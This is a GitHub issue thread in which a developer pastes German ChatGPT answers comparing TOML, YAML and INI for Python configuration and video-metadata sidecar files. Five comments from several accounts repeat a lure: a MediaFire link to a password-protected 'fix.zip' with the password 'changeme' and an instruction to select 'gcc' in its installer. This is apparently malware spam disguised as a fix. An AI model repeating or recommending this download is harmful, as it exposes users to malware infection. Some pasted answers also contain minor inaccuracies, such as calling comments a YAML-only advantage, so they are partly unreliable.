### ISSUE TITLE
TOML replaces setup.py

### ISSUE THREAD

**Issue by kurmann** [kurmann/videoschnitt#551]
https://www.youtube.com/watch?v=3QvUqHIglmo

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by kurmann** [comment]
Lieber ChatGPT. Ich verwende für Python-Konfiguration ein YAML-File. Jetzt habe ich TOML kennengelernt, mit dem bekanntlich auch Python-Projekte beschrieben werden.

https://toml.io/en/

Was hätte ich für Vorteile und Nachteile?

---

Die Wahl zwischen YAML und TOML für die Konfiguration von Python-Projekten hat jeweils spezifische Vor- und Nachteile. Ich werde diese kurz für dich zusammenfassen.

### Vorteile von TOML gegenüber YAML:

1. **Einfachere Syntax und Lesbarkeit:**
   - TOML hat eine klarere und weniger fehleranfällige Syntax. Es gibt keine Mehrdeutigkeit bei der Einrückung (wie in YAML), und die Struktur ist konsistenter.
   - TOML wurde speziell entwickelt, um sowohl für Maschinen als auch für Menschen leicht lesbar und verständlich zu sein.

2. **Weniger Fehleranfälligkeit:**
   - YAML kann bei der Formatierung, insbesondere bei Einrückungen und Sonderzeichen, leicht fehleranfällig sein. In TOML ist das Risiko von Formatierungsfehlern geringer.

3. **Bessere Unterstützung für strukturierte Daten:**
   - TOML hat eine native Unterstützung für Tabellen (ähnlich wie Dictionaries) und Arrays, was die Arbeit mit strukturierten Daten erleichtert. Besonders bei verschachtelten Konfigurationen ist TOML übersichtlicher.

4. **Standardisierung:**
   - TOML hat eine striktere und klarere Spezifikation, was sicherstellt, dass unterschiedliche Implementierungen und Parser konsistent arbeiten. YAML kann je nach Parser unterschiedliche Interpretationen haben.

5. **Einfache Typenverwaltung:**
   - TOML unterstützt nativ Datentypen wie Datumsangaben, Arrays und Zahlenformate (z. B. Ganzzahlen und Fließkommazahlen), was in YAML nicht so elegant gelöst ist.

### Nachteile von TOML gegenüber YAML:

1. **Geringere Flexibilität:**
   - YAML ist flexibler und leistungsfähiger als TOML. Es unterstützt zum Beispiel Verweise (Anchors), mit denen du wiederkehrende Strukturen definieren kannst. Solche Features fehlen in TOML.

2. **Weniger verbreitet:**
   - YAML ist weit verbreitet und wird in vielen Ökosystemen verwendet (z. B. Ansible, Kubernetes). Wenn du mit anderen Tools zusammenarbeitest, die YAML als Standard nutzen, könnte es sinnvoll sein, bei YAML zu bleiben.

3. **Komplexere Strukturen:**
   - Für sehr komplexe Konfigurationen kann YAML besser geeignet sein, da es flexiblere Datenstrukturen und erweiterte Funktionen wie Kommentare und Verweise bietet.

4. **Ökosystem-Unterstützung:**
   - In Python-Projekten ist YAML häufig besser unterstützt, da viele Libraries und Tools auf YAML setzen. Die TOML-Unterstützung wächst jedoch stetig, besonders im Python-Ökosystem (z. B. `pyproject.toml`).

### Fazit:
Wenn du eine klare, einfache und leicht zu lesende Konfigurationssprache benötigst und keine allzu komplexen Anforderungen hast, bietet TOML einige Vorteile. YAML ist allerdings flexibler und leistungsfähiger, vor allem bei komplexeren Konfigurationsdateien und in Projekten, die stark auf YAML setzen. 

Für Python-spezifische Projekte könnte es sinnvoll sein, auf TOML zu setzen, da es im Python-Ökosystem zunehmend an Bedeutung gewinnt (z. B. durch `pyproject.toml`).

**Comment by kurmann** [comment]
Erkläre mir das Problem mit dem Einrücken hinsichtlich Mehrdeutigkeit bei YAML

---

Das Problem mit der Einrückung in YAML entsteht hauptsächlich aufgrund der Art und Weise, wie YAML Datenstrukturen definiert. YAML ist **whitespace-sensitiv**, was bedeutet, dass die Struktur eines Dokuments durch Einrückungen festgelegt wird. Das kann zu Mehrdeutigkeiten und Fehlern führen, wenn nicht exakt auf die Einrückung geachtet wird. Hier sind einige Details dazu:

### 1. **Einrückungen definieren die Struktur:**
In YAML werden Listen, Dictionaries (also Schlüssel-Wert-Paare) und Verschachtelungen durch Einrückungen definiert. Diese Einrückungen müssen **konsistent** sein, was bedeutet, dass alle Elemente auf der gleichen Ebene die gleiche Anzahl an Leerzeichen haben müssen.

Beispiel:

```yaml
personen:
  - name: Max
    alter: 30
  - name: Anna
    alter: 25
```

Hier gibt die Einrückung an, dass `name` und `alter` zur selben Person gehören. Eine falsche Einrückung würde die Struktur ändern und die Daten falsch interpretieren.

### 2. **Fehler durch inkonsistente Einrückungen:**
Selbst kleine Fehler bei der Einrückung können dazu führen, dass die Datei nicht korrekt interpretiert wird. Zum Beispiel:

```yaml
personen:
  - name: Max
      alter: 30
  - name: Anna
    alter: 25
```

In diesem Fall ist das zweite Einrückungslevel bei `alter: 30` inkonsistent (es hat mehr Leerzeichen als nötig). Das führt entweder zu einem Syntaxfehler oder dazu, dass die Struktur anders interpretiert wird, als man es erwartet.

### 3. **Tabs vs. Leerzeichen:**
Ein weiterer häufiger Fehler entsteht durch die Verwendung von Tabs anstelle von Leerzeichen oder eine Mischung aus beidem. YAML spezifiziert, dass Einrückungen durch Leerzeichen erfolgen müssen. Tabs können zu Syntaxfehlern oder einer unerwarteten Interpretation führen.

### 4. **Mehrdeutigkeit bei Listen und Maps:**
Ein weiteres Problem tritt auf, wenn Listen und Schlüssel-Wert-Paare auf derselben Einrückungsebene stehen. Dies kann zu Mehrdeutigkeiten führen:

```yaml
details:
  - adresse: "Hauptstrasse 1"
    stadt: "Bern"
  telefon: "01234 567890"
```

Hier könnte der Parser fälschlicherweise annehmen, dass `telefon` zu einem neuen Element gehört, statt zu der Liste von `details`. Das passiert, weil die Einrückung nicht klar macht, dass `telefon` eigentlich auf einer anderen Ebene stehen sollte.

### 5. **Schwierige Fehlersuche:**
Einrückungsfehler sind oft schwer zu erkennen, besonders in komplexen Dateien. Ein kleines, nicht sichtbares Leerzeichen kann den Unterschied ausmachen und führt zu Problemen, die schwer zu diagnostizieren sind.

### Zusammenfassung:
Das Problem der Mehrdeutigkeit bei YAML entsteht also dadurch, dass die Struktur eines Dokuments durch Einrückungen definiert wird. Fehler in der Einrückung führen entweder zu Syntaxfehlern oder dazu, dass die Daten anders interpretiert werden, als es der Entwickler beabsichtigt hat. Dies macht YAML anfällig für schwer zu erkennende Fehler, besonders bei komplexen Konfigurationsdateien.

**Comment by kurmann** [comment]
Du hast das sehr gut erklärt. Könnte TOML auch ein Datenspeicherformat zu sein um bspw. Video-Metadaten als Sidecar-File zu speichern?

---

Ja, TOML könnte durchaus ein geeignetes Format sein, um Video-Metadaten als Sidecar-Files zu speichern. Es gibt jedoch Vor- und Nachteile, die du beachten solltest, wenn du TOML für diesen Zweck verwenden möchtest.

### Vorteile von TOML als Sidecar-Format:

1. **Lesbarkeit und Verständlichkeit:**
   TOML wurde entworfen, um sowohl für Maschinen als auch für Menschen leicht lesbar und verständlich zu sein. Die klare Struktur und die einfache Syntax machen es für Menschen intuitiv lesbar, was bei der Bearbeitung oder Inspektion von Metadaten hilfreich ist.

2. **Klare Unterstützung für einfache und strukturierte Datentypen:**
   TOML unterstützt verschiedene Datentypen wie Strings, Zahlen, Booleans, Arrays und Datumsangaben. Für Video-Metadaten, die oft eine Mischung aus solchen Typen enthalten (wie Titel, Erstellungsdatum, Tags und technische Details), ist TOML sehr gut geeignet.

   Beispiel einer Video-Metadatei in TOML:
   ```toml
   title = "Urlaubsvideo 2024"
   description = "Ein schönes Video von unserem Urlaub am Meer."
   duration = "02:15:30" # Stunden:Minuten:Sekunden
   tags = ["Urlaub", "Meer", "Sommer"]
   
   [technical]
   resolution = "1920x1080"
   framerate = 30.0
   codec = "H.264"
   ```

3. **Strukturierte und hierarchische Daten:**
   TOML ermöglicht die klare Trennung und Strukturierung von Daten durch Abschnitte und Tabellen (wie im `[technical]`-Beispiel oben). Das ist besonders nützlich, wenn die Metadaten komplexer sind und verschiedene Kategorien oder Gruppen beinhalten.

4. **Einfache Serialisierung und Deserialisierung:**
   Es gibt zahlreiche gut gepflegte Bibliotheken für die Arbeit mit TOML in Python, Go, Rust und anderen Programmiersprachen. Das macht es einfach, TOML-Dateien zu erstellen, zu lesen und zu schreiben.

### Nachteile von TOML als Sidecar-Format:

1. **Eingeschränkte Flexibilität bei komplexen Datenstrukturen:**
   Im Vergleich zu YAML oder JSON ist TOML weniger flexibel, wenn es um sehr komplexe oder tief verschachtelte Datenstrukturen geht. Für einfache bis mittelkomplexe Metadaten ist das kein Problem, aber bei sehr komplexen Anforderungen könnte TOML an seine Grenzen stoßen.

2. **Weniger verbreitet für Metadaten:**
   Während JSON und YAML in vielen Anwendungsfällen bereits als Standard für Sidecar-Files etabliert sind (z. B. JSON für viele Web-APIs), ist TOML in diesem Bereich noch nicht so weit verbreitet. Wenn du mit Tools arbeiten musst, die bestimmte Metadatenformate erwarten, könnte dies ein Nachteil sein.

3. **Keine native Unterstützung für binäre Daten:**
   Wenn du komplexere Metadaten speichern möchtest, wie eingebettete Binärdaten (z. B. Thumbnails oder kleinere Vorschaubilder), bietet TOML keine direkte Unterstützung. Hier müsstest du auf Base64-Encoding zurückgreifen, was umständlich sein kann.

### Fazit:
TOML ist ein sehr gutes Format für die Speicherung von Video-Metadaten als Sidecar-Files, besonders wenn die Metadaten primär aus strukturierten, textbasierten Informationen bestehen. Es bietet eine gute Balance zwischen Lesbarkeit und Strukturierung, ist einfach zu handhaben und eignet sich gut für Szenarien, in denen Menschen die Metadaten direkt lesen und bearbeiten müssen.

Falls du jedoch komplexere oder tief verschachtelte Metadaten speichern möchtest, oder eine breite Unterstützung durch existierende Tools benötigst, könnte JSON oder YAML eine geeignetere Wahl sein. TOML eignet sich besonders dann, wenn Lesbarkeit und einfache Strukturierung im Vordergrund stehen.

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by kurmann** [comment]
Ja ich sehe den Punkt mit der Verschachtelung. Diese hast du naturgemäss wenig bei Config file. Ich halte mich also an die offizielle Empfehung

> "A config file format for humans.
> TOML aims to be a minimal configuration file format that's easy to read due to obvious semantics. TOML is designed to map unambiguously to a hash table. TOML should be easy to parse into data structures in a wide variety of languages."
> 

und setze es nicht als allgemeines Datenformat sondern für Configs ein.

---

Das ist eine sehr vernünftige Entscheidung! Die offizielle Empfehlung hebt genau das hervor, wofür TOML am besten geeignet ist: Konfigurationsdateien. Es wurde bewusst einfach gehalten und auf die wesentlichen Anforderungen eines Konfigurationsformats optimiert – Klarheit, Lesbarkeit und einfache Zuordnung zu Datenstrukturen (wie Hash-Tabellen).

Für Konfigurationsdateien, bei denen die Daten oft flach oder nur leicht verschachtelt sind und vor allem von Menschen lesbar und editierbar sein sollen, ist TOML ideal. Die Präzision und Einfachheit, die TOML bietet, machen es zur perfekten Wahl für genau diesen Zweck.

Wenn du also ein übersichtliches, leicht wartbares Format für Konfigurationen benötigst, bist du mit TOML sehr gut beraten. Für komplexere oder umfangreichere Datenstrukturen bleibt es sinnvoll, auf dafür etablierte Formate wie JSON, YAML oder spezialisierte Binärformate zurückzugreifen.

Falls du irgendwann ein anderes Anwendungsfeld ins Auge fasst, kannst du dann gezielt das passende Format wählen. Aber für Configs hast du mit TOML eine ausgezeichnete Wahl getroffen!

**Comment by HaxBaba123** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by kurmann** [comment]
Ist das Format nicht fast das Gleiche wie das INI-Format, das ich noch aus den 90er-Jahren kenne?

---

Ja, TOML und das INI-Format haben tatsächlich viele Gemeinsamkeiten, und du liegst richtig, dass sie sich auf den ersten Blick sehr ähnlich sind. TOML kann als eine modernisierte und weiterentwickelte Version des INI-Formats betrachtet werden, das besonders für Konfigurationsdateien genutzt wurde und noch immer in einigen Bereichen verwendet wird. Dennoch gibt es einige wichtige Unterschiede zwischen den beiden Formaten:

### Ähnlichkeiten:

1. **Abschnittsbasierte Struktur:**
   Beide Formate verwenden Abschnitte, die mit eckigen Klammern definiert werden. Zum Beispiel:
   ```ini
   [section]
   key = value
   ```

   In TOML sieht das ähnlich aus:
   ```toml
   [section]
   key = "value"
   ```

2. **Schlüssel-Wert-Paare:**
   In beiden Formaten sind Konfigurationen als Schlüssel-Wert-Paare organisiert.

### Unterschiede:

1. **Datentypen:**
   Das INI-Format unterstützt typischerweise nur Strings als Werte, während TOML explizite Unterstützung für verschiedene Datentypen bietet, wie Integer, Float, Bool, Arrays, und Datumsangaben. Das INI-Format verlässt sich oft darauf, dass Anwendungen die Werte entsprechend interpretieren.

   Beispiel in TOML:
   ```toml
   is_active = true  # Boolean
   count = 42        # Integer
   price = 19.99     # Float
   tags = ["video", "config"]  # Array
   ```

2. **Verschachtelung:**
   Während INI-Dateien kaum Unterstützung für verschachtelte Datenstrukturen bieten, ermöglicht TOML das durch die Verwendung von Tabellen und Untertabellen:

   ```toml
   [database]
   server = "localhost"
   ports = [8001, 8002, 8003]

   [database.credentials]
   user = "admin"
   password = "secret"
   ```

   Im INI-Format wäre das entweder unmöglich oder müsste auf unelegante Weise mit künstlichen Schlüsseln umgesetzt werden:
   ```ini
   [database]
   server = localhost
   ports = 8001,8002,8003

   [database.credentials]
   user = admin
   password = secret
   ```

3. **Standardisierung und Spezifikation:**
   Das INI-Format ist sehr unstrukturiert und es gibt keine klar definierte Spezifikation, was zu Inkonsistenzen bei der Implementierung in verschiedenen Programmen führt. TOML hingegen hat eine strikte Spezifikation, die sicherstellt, dass Parser und Implementierungen konsistent arbeiten.

4. **String-Handling:**
   TOML erlaubt verschiedene Arten von Strings, einschließlich einfacher und doppelter Anführungszeichen, mehrzeiliger Strings und roher (unescaped) Strings. Im Gegensatz dazu sind Strings im INI-Format eher rudimentär und unterstützen solche Funktionen nicht.

   Beispiel in TOML:
   ```toml
   multiline_string = """
   Das ist
   ein mehrzeiliger
   String.
   """
   ```

5. **Kommentare:**
   Beide Formate unterstützen Kommentare, aber in TOML werden Kommentare ausschließlich mit `#` eingeleitet, während im INI-Format sowohl `;` als auch `#` verwendet werden können.

### Fazit:
Während TOML oberflächlich betrachtet dem INI-Format ähnelt, ist es ein deutlich fortschrittlicheres und flexibleres Format. Es behebt viele der Einschränkungen, die das alte INI-Format hatte, und bietet eine moderne, gut spezifizierte Lösung für Konfigurationsdateien. TOML eignet sich hervorragend für Projekte, bei denen Lesbarkeit, Klarheit und Unterstützung verschiedener Datentypen wichtig sind – etwas, das im INI-Format oft schwierig oder gar nicht umsetzbar ist.

**Comment by kurmann** [comment]
Schnellste Library: https://pypi.org/project/rtoml/

Quelle: https://github.com/toml-lang/toml/wiki

**Comment by kurmann** [comment]
Umgesetzt
